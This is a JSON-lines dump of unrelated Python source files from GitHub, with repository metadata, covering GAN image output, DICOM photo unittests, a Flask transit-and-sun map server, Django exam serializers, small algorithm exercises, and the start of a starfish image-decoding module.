generator_model.predict((z))\n fake_imgs = 0.5 * fake_imgs + 0.5 # 0 ~ 1 사이의 값을 가지도록 스케일링\n _, axs = plt.subplots(row, col, figsize=(row, col), sharey=True, sharex=True)\n cnt = 0\n for i in range(row):\n for j in range(col):\n axs[i, j].imshow(fake_imgs[cnt, :, :, 0], cmap='gray')\n axs[i, j].axis('off')\n cnt += 1\n path = os.path.join(OUT_DIR, 'img-{}'.format(itr+1))\n plt.savefig(path)\n plt.close()\n \n","repo_name":"5kdk/Generative_Adversarial_Network_GAN_exam","sub_path":"exam15_CNN_GAN.py","file_name":"exam15_CNN_GAN.py","file_ext":"py","file_size_in_byte":4668,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"9152284816","text":"'''\nUnittests for DICOM objects.\n\n@author: Toni Magni\n'''\nimport unittest\nimport logging\nimport importlib\nfrom io import BytesIO\nimport dicom4ortho.m_orthodontic_photograph\nfrom dicom4ortho.controller import SimpleController\nfrom dicom4ortho.m_orthodontic_photograph import OrthodonticPhotograph\nfrom dicom4ortho.defaults import generate_dicom_uid\nfrom datetime import datetime, timezone, timedelta\nfrom pathlib import Path\n\nimport PIL\nfrom pydicom.dataset import Dataset\n\ndef make_photo_metadata():\n metadata = {\n \"patient_firstname\": \"Michael\",\n \"patient_lastname\": \"Jackson\",\n \"patient_id\": \"X1\",\n \"patient_sex\": \"M\",\n \"patient_birthdate\": \"1958-08-29\",\n \"dental_provider_firstname\": \"Conrad\",\n \"dental_provider_lastname\": \"Murray\",\n \"study_instance_uid\": generate_dicom_uid(),\n \"series_instance_uid\": generate_dicom_uid(),\n \"series_description\": \"UnitTest make_photo_metadata\",\n \"days_after_event\": 212,\n \"treatment_event_type\": \"OrthodonticTreatment\"\n }\n return metadata\n\n\ndef photo_generator(image_type: str, filename: Path) -> OrthodonticPhotograph:\n o = OrthodonticPhotograph(\n image_type=image_type,\n )\n o.patient_firstname = \"Michael\"\n o.patient_lastname = \"Jackson\"\n o.patient_id = \"X1\"\n o.patient_birthdate = datetime(1958, 8, 29).date()\n o.patient_sex = \"M\"\n o.dental_provider_firstname = \"Conrad\"\n o.dental_provider_lastname = \"Murray\"\n o.input_image_filename = filename\n o.output_image_filename = o.input_image_filename.with_suffix(\".dcm\")\n return o\n\n\nclass PhotoTests(unittest.TestCase):\n\n def setUp(self):\n logging.basicConfig(format='%(asctime)s - %(levelname)s - %(funcName)s: %(message)s',\n level=logging.INFO)\n\n def tearDown(self):\n pass\n\n def testDates(self):\n o = OrthodonticPhotograph()\n o.study_datetime = datetime(1592, 2, 3, 12, 14, 11)\n self.assertEqual(o._ds.StudyDate, \"15920203\")\n self.assertEqual(o._ds.StudyTime, \"121411.000000\")\n self.assertEqual(o.study_datetime, datetime(1592, 2, 3, 12, 14, 11))\n\n o.series_datetime = datetime(1492, 2, 3, 13, 14)\n self.assertEqual(o._ds.SeriesDate, \"14920203\")\n self.assertEqual(o._ds.SeriesTime, \"131400.000000\")\n self.assertEqual(o.series_datetime, datetime(1492, 2, 3, 13, 14))\n\n o.timezone = timezone(timedelta(hours=+1))\n o.acquisition_datetime = datetime(1992, 2, 3, 12, 14, 11)\n self.assertEqual(o._ds.AcquisitionDateTime,\n \"19920203121411.000000+0100\")\n self.assertEqual(o._ds.AcquisitionDate, \"19920203\")\n self.assertEqual(o._ds.AcquisitionTime, \"121411.000000\")\n\n o.timezone = timezone(timedelta(hours=-9))\n self.assertEqual(o._ds.TimezoneOffsetFromUTC, \"-0900\")\n self.assertEqual(o.timezone, timezone(timedelta(hours=-9)))\n\n o.set_time_captured(datetime(1993, 10, 12, 22, 32, 43))\n self.assertEqual(o._ds.AcquisitionDateTime,\n \"19931012223243.000000-0900\")\n self.assertEqual(o._ds.AcquisitionDate, \"19931012\")\n self.assertEqual(o._ds.AcquisitionTime, \"223243.000000\")\n self.assertEqual(o._ds.ContentDate, \"19931012\")\n self.assertEqual(o._ds.ContentTime, \"223243.000000\")\n\n def testProgress(self):\n md = make_photo_metadata()\n md[\"days_after_event\"] = 212\n md[\"treatment_event_type\"] = \"OrthodonticTreatment\"\n md[\"image_type\"] = \"EV08\"\n o = OrthodonticPhotograph(**md)\n o._set_dicom_attributes()\n\n self.assertEqual(o._ds.AcquisitionContextSequence[3].NumericValue,212)\n\n\n def testNames(self):\n o = OrthodonticPhotograph()\n o.dental_provider_firstname = \"Toni\"\n self.assertEqual(o._ds.ReferringPhysicianName, \"^Toni\")\n\n o = OrthodonticPhotograph()\n o.dental_provider_lastname = \"Magni\"\n self.assertEqual(o._ds.ReferringPhysicianName, \"Magni^\")\n\n o = OrthodonticPhotograph()\n o.dental_provider_firstname = \"Toni\"\n o.dental_provider_lastname = \"Magni\"\n self.assertEqual(o._ds.ReferringPhysicianName, \"Magni^Toni\")\n self.assertEqual(o.dental_provider_firstname, \"Toni\")\n self.assertEqual(o.dental_provider_lastname, \"Magni\")\n myio = BytesIO()\n o.save_implicit_little_endian(myio)\n\n o = OrthodonticPhotograph()\n o.patient_firstname = \"Toni\"\n self.assertEqual(o._ds.PatientName, \"^Toni\")\n\n o = OrthodonticPhotograph()\n o.patient_lastname = \"Magni\"\n self.assertEqual(o._ds.PatientName, \"Magni^\")\n\n o = OrthodonticPhotograph()\n o.patient_firstname = \"Toni\"\n o.patient_lastname = \"Magni\"\n self.assertEqual(o._ds.PatientName, \"Magni^Toni\")\n self.assertEqual(o.patient_firstname, \"Toni\")\n self.assertEqual(o.patient_lastname, \"Magni\")\n\n o = OrthodonticPhotograph()\n o.operator_firstname = \"Toni\"\n self.assertEqual(o._ds.OperatorsName, \"^Toni\")\n\n o = OrthodonticPhotograph()\n o.operator_lastname = \"Magni\"\n self.assertEqual(o._ds.OperatorsName, \"Magni^\")\n\n o = OrthodonticPhotograph()\n o.operator_firstname = \"Toni\"\n o.operator_lastname = \"Magni\"\n self.assertEqual(o._ds.OperatorsName, \"Magni^Toni\")\n self.assertEqual(o.operator_firstname, \"Toni\")\n self.assertEqual(o.operator_lastname, \"Magni\")\n\n @unittest.skip(\"I don't think NEF is read properly by Pillow\")\n def testNEF(self):\n metadata = make_photo_metadata()\n metadata['input_image_filename'] = Path(\n \".\") / \"test\" / \"resources\" / \"DSC_0001.NEF\"\n metadata['image_type'] = \"IV05\"\n c = SimpleController()\n c.convert_image_to_dicom4orthograph(metadata=metadata)\n\n def testJPG(self):\n resource_path = None\n with importlib.resources.path(\"test.resources\",\"input_from.csv\") as input_csv:\n resource_path = Path(input_csv).parent.absolute()\n\n metadata = make_photo_metadata()\n metadata['input_image_filename'] = resource_path / \"sample_NikonD90.JPG\"\n metadata['image_type'] = \"IV06\"\n c = SimpleController()\n c.convert_image_to_dicom4orthograph(metadata=metadata)\n output_file = (resource_path / \"sample_NikonD90.dcm\")\n assert output_file.exists()\n output_file.unlink()\n\n metadata = make_photo_metadata()\n metadata['input_image_filename'] = resource_path / \"sample_NikonD5600.JPG\"\n metadata['image_type'] = \"IV06\"\n c = SimpleController()\n c.convert_image_to_dicom4orthograph(metadata=metadata)\n output_file = resource_path / \"sample_NikonD5600.dcm\"\n assert output_file.exists()\n output_file.unlink()\n\n metadata = make_photo_metadata()\n metadata['input_image_filename'] = resource_path / \"sample_topsOrtho.jp2\"\n metadata['image_type'] = \"IV06\"\n c = SimpleController()\n c.convert_image_to_dicom4orthograph(metadata=metadata)\n output_file = (resource_path / \"sample_topsOrtho.dcm\")\n assert output_file.exists()\n c.validate_dicom_file()\n output_file.unlink()\n\n @unittest.skip(\"Just a tool, not a test\")\n def testEXIF(self):\n filename = Path(\n # \".\") / \"test\" / \"resources\" / \"sample_topsOrtho.jp2\"\n \".\") / \"test\" / \"resources\" / \"sample_NikonD90.JPG\"\n with PIL.Image.open(filename) as img:\n exif_ifd = img.getexif().getifd\n exif_raw = img.getexif().items()\n for tag in exif_raw:\n print(f\"{tag}\")\n exif = {\n PIL.ExifTags.TAGS[k]: v\n for k, v in exif_raw\n if k in PIL.ExifTags.TAGS\n }\n for tag in exif.items():\n print(f\"{tag}\")\n\n\n@unittest.skip(\"Just a tool, not a test\")\nclass MPO(unittest.TestCase):\n def testsplitMPO(self):\n filename = Path(\n \".\") / \"test\" / \"resources\" / \"DSC_0001.JPG\"\n with PIL.Image.open(filename) as img:\n num_frames = getattr(img, \"n_frames\", 1)\n logging.info(f\"Found {num_frames} frames in {img.format} image\")\n for i in range(num_frames):\n outputfilename = Path(f\"{filename.stem}_{i}{filename.suffix}\")\n img.seek(i)\n img.save(outputfilename, format='jpeg')\n\n self.assertTrue(outputfilename.exists())\n","repo_name":"open-ortho/dicom4ortho","sub_path":"test/test_photography.py","file_name":"test_photography.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"37"} +{"seq_id":"9419447452","text":"from flask import Flask, jsonify, request, session, g, redirect, url_for, abort, render_template, flash\nfrom datetime import date, datetime\nimport get_best_stop_id\nimport get_sunposition\nfrom trip_details import get_trips_details\nimport pandas as pd\nimport json\nimport time\n\napp = Flask(__name__)\napp.config.from_object(__name__)\n\napp.config.from_envvar('APP_CONFIG_FILE')\nMAPBOX_ACCESS_KEY = app.config['MAPBOX_ACCESS_KEY']\nTRANSPORT_NSW_ACCESS_KEY = app.config['TRANSPORT_NSW_ACCESS_KEY']\napp.secret_key = 'wicked'\n\nexecution_counter = 0\nuser_origin = 'Parramatta Station'\nuser_destination = 'Central Station'\nuser_time = '2019-10-10T10:30:03'\ntrip_details = get_trips_details(user_origin,user_destination,user_time)\ncoords_list = [[trip_details['lon'][val],trip_details['lat'][val]] for val in range(0,len(trip_details))]\n#sun_list = trip_details['sun_pos']\n#[[trip_details['sun_pos'][val],trip_details['sun_pos'][val]] for val in range(0,len(trip_details))]\nsun_list = [[trip_details['sun_pos_lon'][val],trip_details['sun_pos_lat'][val]] for val in range(0,len(trip_details))]\n#print(coords_list)\n\n\n\n@app.route('/mapbox_gl', methods=['POST','GET'])\ndef mapbox_gl():\n print(\"I am called\")\n a = get_user_trip_details()\n global user_origin, user_destination, user_time\n global execution_counter\n global trip_details, coords_list, sun_list\n \n print(\"this has fired\", execution_counter, \"times\")\n print(\"User_Time\", user_time)\n \n getters()\n # user_time = session.get('my_var', None)\n # dd = session.get('dd', None)\n\n #print('getters returned',user_time,dds)\n\n\n if a is not None and execution_counter > 0:\n print(\"POST Returned\")\n print(a)\n if a['id'] == 'destination':\n user_destination = a['data']\n try:\n #print(user_origin, user_destination)\n trip_details = get_trips_details(user_origin, user_destination,user_time)\n coords_list = [[trip_details['lon'][val],trip_details['lat'][val]] for val in range(0,len(trip_details))]\n sun_list = [[trip_details['sun_pos_lon'][val],trip_details['sun_pos_lat'][val]] for val in range(0,len(trip_details))]\n\n except NameError:\n print('here 2')\n print('origin not user defined, so set it to default')\n trip_details = get_trips_details('Parramatta Station', user_destination,user_time)\n coords_list = [[trip_details['lon'][val],trip_details['lat'][val]] for val in range(0,len(trip_details))]\n sun_list = [[trip_details['sun_pos_lon'][val],trip_details['sun_pos_lat'][val]] for val in range(0,len(trip_details))]\n else:\n user_origin = a['data']\n #print(user_origin)\n try:\n trip_details = get_trips_details(user_origin, user_destination,user_time)\n coords_list = [[trip_details['lon'][val],trip_details['lat'][val]] for val in range(0,len(trip_details))]\n sun_list = [[trip_details['sun_pos_lon'][val],trip_details['sun_pos_lat'][val]] for val in range(0,len(trip_details))]\n\n except NameError:\n print('destination not user defined, so set it to default')\n trip_details = get_trips_details(user_origin, 'Central Station',user_time)\n coords_list = [[trip_details['lon'][val],trip_details['lat'][val]] for val in range(0,len(trip_details))]\n sun_list = [[trip_details['sun_pos_lon'][val],trip_details['sun_pos_lat'][val]] for val in range(0,len(trip_details))]\n \n print(\"i've finished\")\n\n elif execution_counter > 0:\n print(\"time has changed\")\n trip_details = get_trips_details(user_origin, user_destination,user_time)\n coords_list = [[trip_details['lon'][val],trip_details['lat'][val]] for val in range(0,len(trip_details))]\n sun_list = [[trip_details['sun_pos_lon'][val],trip_details['sun_pos_lat'][val]] for val in range(0,len(trip_details))]\n session['reload_val'] = 2\n load_refresh()\n\n execution_counter = execution_counter + 1\n \n return render_template(\n 'mapbox_gl.html', \n ACCESS_KEY=MAPBOX_ACCESS_KEY,\n Long = trip_details['lon'][0],\n Lat = trip_details['lat'][0],\n my_test = execution_counter,\n sun_posi = sun_list,\n origin_name = user_origin,\n destination_name = user_destination,\n execution_counter = execution_counter,\n geojson_input = coords_list #needs to be geojson form or list of lists i think \n )\ndef get_user_trip_details():\n data = request.get_json()\n return data\n\n@app.route('/getters', methods=['POST','GET'])\ndef getters():\n print(\"ive been called from getters\")\n global execution_counter\n print(execution_counter)\n \n if request.method == 'POST':\n print('Incoming..')\n print(request.get_json()) # parse as JSON\n #print(\"ummmmmmmmmm\")\n print('time')\n print(request.get_json()['time'])\n\n print('test')\n print(request.get_json()['test'])\n\n # session['my_var'] = request.get_json()['time']\n #session['dd'] = request.get_json()['dest']\n\n return redirect(url_for('mapbox_gl'))\n\n # GET request\n else:\n print(request.get_json())\n message = {'greeting': execution_counter}\n return jsonify(message) # serialize and use JSON headers\n\n@app.route('/load_fresh', methods=['POST','GET'])\ndef load_refresh():\n print(\"I've been called because everything has loaded and we want to refresh page\")\n\n val = session.get('reload_val')\n user_time = session.get('my_var', None)\n print(val)\n message = {'reload': val, 'time':user_time}\n\n print(message)\n return jsonify(message)\n\n\n\n \n\n","repo_name":"michaelarg/mysunjourney","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17627374451","text":"# Kush Peter\n# 202103103510506\n# B.Tech CSE\n\nwhile(True):\n\ttry:\n\t\tnumber=input(\"This program will throw exception and quit while entering anything other than integer: \")\n\t\tint(number)\n\texcept ValueError:\n\t\tprint(\"Enter a valid number, Press ctrl+c to quit the loop\")\n\t\tbreak","repo_name":"awesomenottee/pracfile","sub_path":"program20.py","file_name":"program20.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21593034481","text":"'''\n 贪婪算法\n'''\n\n\n# 包含需要覆盖的州的列表,用集合表示,不包含重复元素\nstates_needed = set([\"mt\", \"wa\", \"or\", \"id\", \"nv\", \"ut\", \"ca\", \"az\"])\n# 可供选择的广播台清单,用散列表表示\nstations = {}\nstations[\"kfour\"] = set([\"nv\",\"ut\"])\nstations[\"qiukai\"] = set([\"b\",\"a\"])\nstations[\"kfive\"] = set([\"ca\",\"az\",\"or\"])\nstations[\"kone\"] = set([\"id\",\"nv\",\"ut\"])\nstations[\"ktwo\"] = set([\"wa\",\"id\",\"mt\"])\nstations[\"kthree\"] = set([\"or\",\"nv\",\"ca\"])\n\n\nprint(stations)\n\nfinal_stations = set()\n\nwhile states_needed:\n best_station = None\n\n states_covered = set()\n print(\"start\")\n for station, states in stations.items():\n print(\"台 {}\".format(station))\n covered = states_needed & states\n print(\"当前台覆盖的州和需要覆盖的州中重复的台 {}\".format(covered))\n # 找寻最优解 当前问题中要找符合条件的 (在 州中 存在符合条件的台)\n # 最优解为 不但符合条件 还比其他州的台多\n if covered != set():\n if len(covered) > len(states_covered):\n\n print(\"重复的台比上一个包含的states_covered多的时候优于上一个解\")\n best_station = station\n print(\"上次states_covered为 {}\".format(states_covered))\n states_covered = covered\n print(\"更新states_covered {}\".format(states_covered))\n final_stations.add(best_station)\n else:\n print(\"在{}中没有找到符合条件的台\".format(station))\n states_needed -= states_covered\n print(\"还没覆盖的州 {}\".format(states_needed))\n\n\nprint(final_stations)\n","repo_name":"ModelKaiSir/python","sub_path":"alg/search3.py","file_name":"search3.py","file_ext":"py","file_size_in_byte":1671,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24329151741","text":"#header is not given , only pointer of node to be deleted will be given\nclass Node:\n def __init__(self, data, next=None):\n self.data = data\n self.next = next\n\n def __repr__(self):\n return repr(self.data)\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n\n def append(self, data):\n new = Node(data)\n cur = self.head\n if cur is None:\n self.head = new\n return\n\n while cur.next:\n cur = cur.next\n\n cur.next = new\n\n\n def __repr__(self):\n nodes = []\n cur = self.head\n while cur:\n nodes.append(repr(cur.data))\n cur = cur.next\n\n return '[' + ','.join(nodes) + ']'\n\ndef delete(ptr):\n if ptr is None:\n return None\n\n while ptr.next:\n next = ptr.next\n prev = ptr\n ptr.data , next.data = next.data, ptr.data\n ptr = ptr.next\n prev.next = None\n\nif __name__ == \"__main__\":\n ll = LinkedList()\n ll.append(1)\n ll.append(2)\n ll.append(3)\n ll.append(4)\n ll.append(5)\n ll.append(6)\n ll.append(7)\n print(ll)\n delete(ll.head.next.next.next)\n print(ll)\n\n \n \n","repo_name":"prasilla487/Python_excersizes_DSA","sub_path":"linkedlist/delete_without_header.py","file_name":"delete_without_header.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"33608016223","text":"from django.contrib.auth import get_user_model\n\nfrom rest_framework import serializers\n\nfrom .models import (\n Exam,\n Question, \n QuestionAnswer, \n\n UserCheckBoxAnswer, \n UserAnswer, \n UserExam, \n)\nfrom apps.courses.models import Course\n\n\nclass QuestionAnswerSerializer(serializers.ModelSerializer):\n id = serializers.IntegerField(required=False)\n\n class Meta:\n model = QuestionAnswer\n fields = ('id', 'title', 'is_correct', )\n\n\nclass ExamQuestionSerializer(serializers.ModelSerializer):\n answers = QuestionAnswerSerializer(many=True, required=False)\n id = serializers.IntegerField(required=False)\n\n class Meta:\n model = Question\n fields = ('id', 'title', 'question_type', 'answers', 'attachment_file')\n\n def validate(self, instance):\n if instance.get('answers'):\n if instance.get('question_type') == Question.RADIO_BUTTON:\n answers = [i for i in instance.get('answers') if i.get('is_correct') == True]\n if len(answers) > 1:\n raise serializers.ValidationError('Must be only one correct answer for radio button question')\n return instance\n\n\nclass ExamCourseSerializer(serializers.Serializer):\n id = serializers.IntegerField()\n title = serializers.CharField(read_only=True)\n\n\nclass ExamSerializer(serializers.ModelSerializer):\n questions = ExamQuestionSerializer(many=True, allow_null=True, write_only=True)\n course = ExamCourseSerializer(required=False)\n\n class Meta:\n model = Exam\n fields = (\n 'id', 'title', 'exam_type', 'questions', \n 'course', 'is_active', 'time_duration', \n )\n\n def to_representation(self, instance):\n data = super(ExamSerializer, self).to_representation(instance)\n current_user = self.context['request'].user\n current_user_passed_exam = UserExam.objects.filter(\n user=current_user,\n exam=instance\n )\n if current_user_passed_exam:\n data['passed_exam'] = True\n else:\n data['passed_exam'] = False\n return data\n\n def create(self, validated_data):\n questions = validated_data.pop('questions')\n course = validated_data.pop('course', None)\n if course is not None:\n try:\n course = Course.objects.get(id=course.get('id'))\n except Course.DoesNotExist as e:\n raise serializers.ValidationError(e)\n instance = Exam.objects.create(**validated_data, course=course)\n else:\n instance = Exam.objects.create(**validated_data)\n \n for question in questions:\n answers = question.pop('answers', [])\n exam_question = Question.objects.create(exam=instance, **question)\n for answer in answers:\n QuestionAnswer.objects.create(question=exam_question, **answer)\n return instance\n \n def update(self, instance, validated_data):\n questions = validated_data.pop('questions', [])\n course = validated_data.pop('course', None)\n if course is not None:\n try:\n course = Course.objects.get(id=course.get('id'))\n except Course.DoesNotExist as e:\n raise serializers.ValidationError(e)\n instance.course = course\n for question in questions:\n answers = question.pop('answers', [])\n if question.get('id') is None:\n question_obj = Question.objects.create(exam=instance, **question)\n else:\n question_obj = Question.objects.get(id=question.get('id'))\n question_obj.title = question.get('title')\n question_obj.question_type = question.get('question_type')\n question_obj.save()\n\n for answer in answers:\n if answer.get('id') is None:\n QuestionAnswer.objects.create(question=question_obj, **answer)\n else:\n answer_obj = QuestionAnswer.objects.get(id=answer.get('id'))\n answer_obj.title = answer.get('title')\n answer_obj.is_correct = answer.get('is_correct', False)\n answer_obj.save()\n return super().update(instance, validated_data)\n\n\nclass UserCheckBoxAnswerSerializer(serializers.ModelSerializer):\n class Meta:\n model = UserCheckBoxAnswer\n fields = ('id', 'answer', )\n\n\nclass UserAnswerSerializer(serializers.ModelSerializer):\n check_boxes = UserCheckBoxAnswerSerializer(many=True, required=False)\n id = serializers.IntegerField(required=False)\n\n class Meta:\n model = UserAnswer\n fields = (\n 'id', 'question', 'answer', 'check_boxes', \n 'answer_text', 'additional_file', 'is_correct', \n )\n \n def get_extra_kwargs(self):\n extra_kwargs = super(UserAnswerSerializer, self).get_extra_kwargs()\n if self.context['view'].action in ['create']:\n kwargs = extra_kwargs.get('is_correct', {})\n kwargs['read_only'] = True\n extra_kwargs['is_correct'] = kwargs\n return extra_kwargs \n\n\nclass UserExamSerializer(serializers.ModelSerializer):\n user_answers = UserAnswerSerializer(many=True, write_only=True)\n statistic = serializers.SerializerMethodField()\n\n class Meta:\n model = UserExam\n fields = (\n 'id', 'exam', 'email', 'user_answers', \n 'grade', 'checked', 'statistic', 'first_name', \n 'last_name' , 'phone_number'\n )\n\n def create(self, validated_data):\n user_answers = validated_data.pop('user_answers', [])\n instance = UserExam.objects.create(**validated_data)\n \n # If we dont have Student yet, we can create him here using an email, first, last name and phone number\n # Think about add this method\n if validated_data.get('email'):\n user = get_user_model().objects.filter(email=validated_data.get('email')).first()\n instance.user = user\n instance.save()\n\n ids = []\n for user_answer in user_answers:\n answers = user_answer.pop('check_boxes', [])\n\n if user_answer.get('question').id in ids:\n continue\n ids.append(user_answer.get('question').id)\n user_answer_obj = UserAnswer.objects.create(user_exam=instance, **user_answer)\n\n if answers:\n for answer in answers:\n UserCheckBoxAnswer.objects.create(parent=user_answer_obj, **answer)\n \n instance.auto_check_exam() \n return instance\n \n def validate(self, instance):\n if instance.get('exam') and instance.get('email'):\n exam = Exam.objects.filter(id=instance.get('exam').id).first()\n if exam:\n if not exam.is_active:\n if self.context['request'].user.is_student:\n raise serializers.ValidationError('This exam is not active')\n if UserExam.objects.filter(exam=instance.get('exam').id, email=instance.get('email')):\n raise serializers.ValidationError('This user already has passed this exam')\n return instance\n\n def get_statistic(self, obj):\n return obj.get_statistic()\n\n def update(self, instance, validated_data):\n user_answers = validated_data.pop('user_answers', [])\n for user_answer in user_answers: \n if user_answer.get('id'):\n user_answer_obj = UserAnswer.objects.get(id=user_answer.get('id'))\n user_answer_obj.is_correct = user_answer.get('is_correct')\n user_answer_obj.save()\n\n instance.checked = True # discuss updating this field\n return super().update(instance, validated_data)\n\n\nclass UserDetailSerializer(serializers.ModelSerializer):\n class Meta:\n model = get_user_model()\n fields = ('first_name', 'last_name')\n\n\nclass UserDetailCheckBoxAnswerSerializer(serializers.ModelSerializer):\n answer = QuestionAnswerSerializer()\n class Meta:\n model = UserCheckBoxAnswer\n fields = ('id', 'answer', )\n\n\nclass UserAnswersDetailSerializer(serializers.ModelSerializer):\n check_boxes = UserDetailCheckBoxAnswerSerializer(many=True, required=False)\n id = serializers.IntegerField(required=False)\n answer = QuestionAnswerSerializer()\n question = ExamQuestionSerializer()\n\n class Meta:\n model = UserAnswer\n fields = (\n 'id', 'question', 'answer', 'check_boxes', \n 'answer_text', 'additional_file', 'is_correct', \n )\n\n\nclass UserExamDetailSerializer(serializers.ModelSerializer):\n user = UserDetailSerializer()\n user_answers = UserAnswersDetailSerializer(many=True)\n statistic = serializers.SerializerMethodField()\n\n class Meta:\n model = UserExam\n fields = ('id', 'email', 'grade', 'checked', 'user',\n 'user_answers', 'statistic')\n\n def get_statistic(self, obj):\n return obj.get_statistic()\n\n\nclass UserExamList(serializers.ModelSerializer):\n user = UserDetailSerializer()\n\n class Meta:\n model = UserExam\n fields = ('id', 'email', 'grade', 'checked', 'user')\n\n\nclass QuestionAnswerDetailSerializer(serializers.ModelSerializer):\n class Meta:\n model = QuestionAnswer\n fields = ('id', 'title', 'is_correct', )\n extra_kwargs = {\n 'is_correct': {'write_only': True},\n }\n\n\nclass ExamQuestionDetailSerializer(ExamQuestionSerializer):\n answers = QuestionAnswerDetailSerializer(many=True, required=False)\n\n\nclass ExamDetailStudentsSerializer(serializers.ModelSerializer):\n questions = ExamQuestionDetailSerializer(many=True, allow_null=True)\n course = ExamCourseSerializer()\n user_exams = UserExamList(many=True)\n\n class Meta:\n model = Exam\n fields = (\n 'id', 'title', 'exam_type', 'questions', \n 'course', 'user_exams', 'is_active', 'time_duration'\n )\n\n\nclass ExamDetailSerializer(ExamDetailStudentsSerializer):\n questions = ExamQuestionSerializer(many=True, allow_null=True)","repo_name":"edzen12/min_crm","sub_path":"backend/crm/apps/exams/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":10182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"13538975321","text":"import turtle\nt = turtle.Pen()\nfor x in range(3):\n t.circle(50)\n t.up()\n t.forward(120)\n t.down()\n\nt.up()\nt.back(120)\nt.back(60)\nt.right(90)\nt.forward(50)\nt.left(90)\nt.down()\nt.circle(50)\nt.up()\nt.back(120)\nt.down()\nt.circle(50)\nturtle.done()","repo_name":"Luckercorgi240/python_codes","sub_path":"Python drawing/olympiclogo.py","file_name":"olympiclogo.py","file_ext":"py","file_size_in_byte":254,"program_lang":"python","lang":"ar","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18040910834","text":"import warnings\nfrom concurrent.futures import ThreadPoolExecutor\nfrom functools import partial\nfrom typing import cast, Dict, List, NamedTuple, Optional, Tuple, Union\n\nimport numpy as np\nimport pandas as pd\nfrom skimage.measure import label, regionprops\nfrom skimage.measure._regionprops import _RegionProperties\nfrom tqdm import tqdm\n\nfrom starfish.core.config import StarfishConfig\nfrom starfish.core.intensity_table.decoded_intensity_table import DecodedIntensityTable\nfrom starfish.core.intensity_table.intensity_table import IntensityTable\nfrom starfish.core.types import Axes, Features, Number, SpotAttributes\n\n\nclass ConnectedComponentDecodingResult(NamedTuple):\n region_properties: List\n label_image: np.ndarray\n decoded_image: np.ndarray\n\n\nclass TargetsMap:\n\n def __init__(self, targets: np.ndarray) -> None:\n \"\"\"\n Creates an invertible mapping between string names of Codebook targets and integer IDs\n that can be interpreted by skimage.measure to decode an image.\n\n Parameters\n ----------\n targets : np.ndarray\n array of string target IDs\n\n \"\"\"\n unique_targets = set(targets) - {'nan'}\n sorted_targets = sorted(unique_targets)\n self._int_to_target: Dict[int, str] = dict(\n zip(range(1, np.iinfo(int).max), sorted_targets)\n )\n self._int_to_target[0] = 'nan'\n self._target_to_int = {v: k for (k, v) in self._int_to_target.items()}\n\n def targets_as_int(self, targets: np.ndarray) -> np.ndarray:\n \"\"\"Transform an array of targets into their integer representation.\n\n Parameters\n ----------\n targets : np.ndarray['U']\n array of string targets to be transformed into integer IDs\n\n Returns\n -------\n np.ndarray[int] :\n array of targets represented by their integer IDs\n\n \"\"\"\n return np.array([self._target_to_int[v] for v in targets])\n\n def targets_as_str(self, targets: np.ndarray) -> np.ndarray:\n \"\"\"Transform an array of integer IDs into their corresponding string target names.\n\n Parameters\n ----------\n targets : np.ndarray[int]\n array of int targets to be transformed into string names\n\n Returns\n -------\n np.ndarray['U']\n array of unicode-encoded target names\n\n \"\"\"\n return np.array([self._int_to_target[v] for v in targets])\n\n def target_as_str(self, integer_target: int) -> str:\n return self._int_to_target[integer_target]\n\n\nclass CombineAdjacentFeatures:\n\n def __init__(\n self,\n min_area: Number,\n max_area: Number,\n connectivity: int = 2,\n mask_filtered_features: bool = True\n ) -> None:\n \"\"\"Combines pixel-wise adjacent features into single larger features using skimage.measure\n\n Parameters\n ----------\n min_area : Number\n Combined features with area below this value are marked as failing filters\n max_area : Number\n Combined features with area above this value are marked as failing filters\n connectivity : int\n Maximum number of orthogonal hops to consider a pixel/voxel as a neighbor. See\n http://scikit-image.org/docs/dev/api/skimage.measure.html#skimage.measure.label for more\n detail. Default = 2.\n mask_filtered_features : bool\n If True, sets all pixels that are failing filters applied prior to this function equal\n to zero, the background value for skimage.measure.label\n\n \"\"\"\n self._min_area = min_area\n self._max_area = max_area\n self._connectivity = connectivity\n self._mask_filtered = mask_filtered_features\n\n @staticmethod\n def _intensities_to_decoded_image(\n intensities: IntensityTable,\n target_map: TargetsMap,\n mask_filtered_features: bool = True\n ) -> np.ndarray:\n \"\"\"\n Construct an image where each pixel corresponds to its decoded target, mapped to a unique\n integer ID\n\n Parameters\n ----------\n intensities : IntensityTable\n Decoded intensities\n target_map : TargetsMap\n Mapping between string target names and integer target IDs\n mask_filtered_features : bool\n If true, all features that fail filters are mapped to zero, which is considered\n 'background' and will not decode to a target (default = True).\n\n Returns\n -------\n np.ndarray[int]\n Image whose pixels are coded as the targets that the ImageStack decoded to at each\n position.\n\n \"\"\"\n # reverses the linearization that was used to transform an ImageStack into an IntensityTable\n max_x = intensities[Axes.X.value].values.max() + 1\n max_y = intensities[Axes.Y.value].values.max() + 1\n max_z = intensities[Axes.ZPLANE.value].values.max() + 1\n\n int_targets = target_map.targets_as_int(intensities[Features.TARGET].values)\n if mask_filtered_features:\n fails_filters = np.where(~intensities[Features.PASSES_THRESHOLDS])[0] # type: ignore\n int_targets[fails_filters] = 0\n\n decoded_image: np.ndarray = int_targets.reshape((max_z, max_y, max_x))\n return decoded_image\n\n @staticmethod\n def _calculate_mean_pixel_traces(\n label_image: np.ndarray,\n intensities: IntensityTable,\n ) -> IntensityTable:\n \"\"\"\n For all pixels that contribute to a connected component, calculate the mean value for\n each (round, ch), producing an average \"trace\" of a feature across the imaging experiment\n\n Parameters\n ----------\n label_image : 